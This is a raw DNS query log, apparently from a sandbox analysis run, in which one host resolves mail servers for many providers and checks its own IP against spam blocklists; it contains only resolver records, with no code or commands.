Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.731384993 CEST	8.8.8.8	192.168.2.4	0xf8a	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.348046064 CEST	8.8.8.8	192.168.2.4	0x6f6c	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.867897034 CEST	8.8.8.8	192.168.2.4	0x63d3	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.912144899 CEST	8.8.8.8	192.168.2.4	0x2647	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:04.956310987 CEST	8.8.8.8	192.168.2.4	0xd770	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.003787994 CEST	8.8.8.8	192.168.2.4	0x7052	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.083518028 CEST	8.8.8.8	192.168.2.4	0x42c3	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.108491898 CEST	8.8.8.8	192.168.2.4	0x7a1c	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.129292011 CEST	8.8.8.8	192.168.2.4	0x2370	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.202022076 CEST	8.8.8.8	192.168.2.4	0xb2d7	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.291987896 CEST	8.8.8.8	192.168.2.4	0x63ec	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.353837013 CEST	8.8.8.8	192.168.2.4	0x428a	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.393575907 CEST	8.8.8.8	192.168.2.4	0xa8dc	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.428014994 CEST	8.8.8.8	192.168.2.4	0xaf6b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:05.428014994 CEST	8.8.8.8	192.168.2.4	0xaf6b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.410753012 CEST	8.8.8.8	192.168.2.4	0xd471	No error (0)	mx.interia.pl		217.74.65.64	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.419306040 CEST	8.8.8.8	192.168.2.4	0x7358	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.818775892 CEST	8.8.8.8	192.168.2.4	0x7928	No error (0)	gmai.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:06.859431028 CEST	8.8.8.8	192.168.2.4	0x713a	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:07.414505005 CEST	8.8.8.8	192.168.2.4	0x2a0	No error (0)	mx1.seznam.cz		77.75.76.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:07.414505005 CEST	8.8.8.8	192.168.2.4	0x2a0	No error (0)	mx1.seznam.cz		77.75.78.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:08.636027098 CEST	8.8.8.8	192.168.2.4	0xb35e	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:08.823668003 CEST	8.8.8.8	192.168.2.4	0xf891	No error (0)	cegetel.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:08.872689009 CEST	8.8.8.8	192.168.2.4	0x98c0	No error (0)	smtp-in.sfr.fr		93.17.128.123	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:08.872689009 CEST	8.8.8.8	192.168.2.4	0x98c0	No error (0)	smtp-in.sfr.fr		93.17.128.165	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:09.286122084 CEST	8.8.8.8	192.168.2.4	0xf29b	No error (0)	education.nsw.gov.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.286122084 CEST	8.8.8.8	192.168.2.4	0xf29b	No error (0)	education.nsw.gov.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.286122084 CEST	8.8.8.8	192.168.2.4	0xf29b	No error (0)	education.nsw.gov.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.286122084 CEST	8.8.8.8	192.168.2.4	0xf29b	No error (0)	education.nsw.gov.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.286122084 CEST	8.8.8.8	192.168.2.4	0xf29b	No error (0)	education.nsw.gov.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.583322048 CEST	8.8.8.8	192.168.2.4	0x53eb	No error (0)	aspmx.l.google.com		108.177.119.26	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:09.687942028 CEST	8.8.8.8	192.168.2.4	0x2736	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:09.820817947 CEST	8.8.8.8	192.168.2.4	0xa2ad	No error (0)	vallipartners.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:09.820817947 CEST	8.8.8.8	192.168.2.4	0xa2ad	No error (0)	vallipartners.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.252280951 CEST	8.8.8.8	192.168.2.4	0xcec2	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.258404016 CEST	8.8.8.8	192.168.2.4	0x7d27	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:10.532211065 CEST	8.8.8.8	192.168.2.4	0x23a1	No error (0)	mail.vallipartners.com		200.58.111.200	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.098464966 CEST	8.8.8.8	192.168.2.4	0x290c	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.098464966 CEST	8.8.8.8	192.168.2.4	0x290c	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.101840019 CEST	8.8.8.8	192.168.2.4	0xa7a4	No error (0)	mx4.hanmail.net		211.231.108.176	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.249017954 CEST	8.8.8.8	192.168.2.4	0xa132	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.522696972 CEST	8.8.8.8	192.168.2.4	0x41b8	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:11.522696972 CEST	8.8.8.8	192.168.2.4	0x41b8	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.084927082 CEST	8.8.8.8	192.168.2.4	0x393a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.084927082 CEST	8.8.8.8	192.168.2.4	0x393a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.084927082 CEST	8.8.8.8	192.168.2.4	0x393a	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.084927082 CEST	8.8.8.8	192.168.2.4	0x393a	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.084927082 CEST	8.8.8.8	192.168.2.4	0x393a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.084927082 CEST	8.8.8.8	192.168.2.4	0x393a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.731283903 CEST	8.8.8.8	192.168.2.4	0x6f5d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:12.731283903 CEST	8.8.8.8	192.168.2.4	0x6f5d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.072523117 CEST	8.8.8.8	192.168.2.4	0x432f	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.096616030 CEST	8.8.8.8	192.168.2.4	0xf5c8	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.323491096 CEST	8.8.8.8	192.168.2.4	0xf841	No error (0)	mx01.mail.icloud.com		17.42.251.10	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.323491096 CEST	8.8.8.8	192.168.2.4	0xf841	No error (0)	mx01.mail.icloud.com		17.56.9.17	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.323491096 CEST	8.8.8.8	192.168.2.4	0xf841	No error (0)	mx01.mail.icloud.com		17.57.152.9	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.323491096 CEST	8.8.8.8	192.168.2.4	0xf841	No error (0)	mx01.mail.icloud.com		17.57.154.6	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.323491096 CEST	8.8.8.8	192.168.2.4	0xf841	No error (0)	mx01.mail.icloud.com		17.57.154.23	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:13.720525026 CEST	8.8.8.8	192.168.2.4	0x6c3f	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.090656996 CEST	8.8.8.8	192.168.2.4	0xe2a9	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.090656996 CEST	8.8.8.8	192.168.2.4	0xe2a9	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.090656996 CEST	8.8.8.8	192.168.2.4	0xe2a9	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.090656996 CEST	8.8.8.8	192.168.2.4	0xe2a9	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.090656996 CEST	8.8.8.8	192.168.2.4	0xe2a9	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.090656996 CEST	8.8.8.8	192.168.2.4	0xe2a9	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.837157965 CEST	8.8.8.8	192.168.2.4	0x6297	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:14.854305983 CEST	8.8.8.8	192.168.2.4	0xed86	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.642854929 CEST	8.8.8.8	192.168.2.4	0xd42	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:15.891309023 CEST	8.8.8.8	192.168.2.4	0xed11	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.014904976 CEST	8.8.8.8	192.168.2.4	0xe85c	No error (0)	charter.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:16.018758059 CEST	8.8.8.8	192.168.2.4	0xd8e0	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.059948921 CEST	8.8.8.8	192.168.2.4	0xf554	No error (0)	mx0.charter.net		47.43.18.9	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.093846083 CEST	8.8.8.8	192.168.2.4	0x9636	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.173702002 CEST	8.8.8.8	192.168.2.4	0xfd24	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.212901115 CEST	8.8.8.8	192.168.2.4	0x2009	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.253490925 CEST	8.8.8.8	192.168.2.4	0xdcc	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.293423891 CEST	8.8.8.8	192.168.2.4	0x3169	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.362118006 CEST	8.8.8.8	192.168.2.4	0x2122	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.594892979 CEST	8.8.8.8	192.168.2.4	0x5731	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.664561987 CEST	8.8.8.8	192.168.2.4	0x319d	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.738344908 CEST	8.8.8.8	192.168.2.4	0x8e13	No error (0)	inkgizmo.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:16.738344908 CEST	8.8.8.8	192.168.2.4	0x8e13	No error (0)	inkgizmo.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:16.793950081 CEST	8.8.8.8	192.168.2.4	0x88f9	No error (0)	mx1.mailchannels.net		44.236.199.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.793950081 CEST	8.8.8.8	192.168.2.4	0x88f9	No error (0)	mx1.mailchannels.net		44.239.29.59	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:16.807240009 CEST	8.8.8.8	192.168.2.4	0x765c	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:17.823879957 CEST	8.8.8.8	192.168.2.4	0x8ded	No error (0)	mx1.seznam.cz		77.75.76.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:17.823879957 CEST	8.8.8.8	192.168.2.4	0x8ded	No error (0)	mx1.seznam.cz		77.75.78.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.008704901 CEST	8.8.8.8	192.168.2.4	0xd833	No error (0)	msn.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:19.098767996 CEST	8.8.8.8	192.168.2.4	0x78dc	No error (0)	msn-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.098767996 CEST	8.8.8.8	192.168.2.4	0x78dc	No error (0)	msn-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.106292963 CEST	8.8.8.8	192.168.2.4	0xc7ae	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.410990000 CEST	8.8.8.8	192.168.2.4	0x772e	No error (0)	mx1.seznam.cz		77.75.76.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.410990000 CEST	8.8.8.8	192.168.2.4	0x772e	No error (0)	mx1.seznam.cz		77.75.78.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:19.663762093 CEST	8.8.8.8	192.168.2.4	0x93f1	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.087903023 CEST	8.8.8.8	192.168.2.4	0x7eed	No error (0)	wp.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:20.087903023 CEST	8.8.8.8	192.168.2.4	0x7eed	No error (0)	wp.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:20.160132885 CEST	8.8.8.8	192.168.2.4	0xac6	No error (0)	mx.wp.pl		212.77.101.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.337083101 CEST	8.8.8.8	192.168.2.4	0x3f21	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.454056978 CEST	8.8.8.8	192.168.2.4	0xdd3	No error (0)	mx.wp.pl		212.77.101.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.632538080 CEST	8.8.8.8	192.168.2.4	0x859a	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
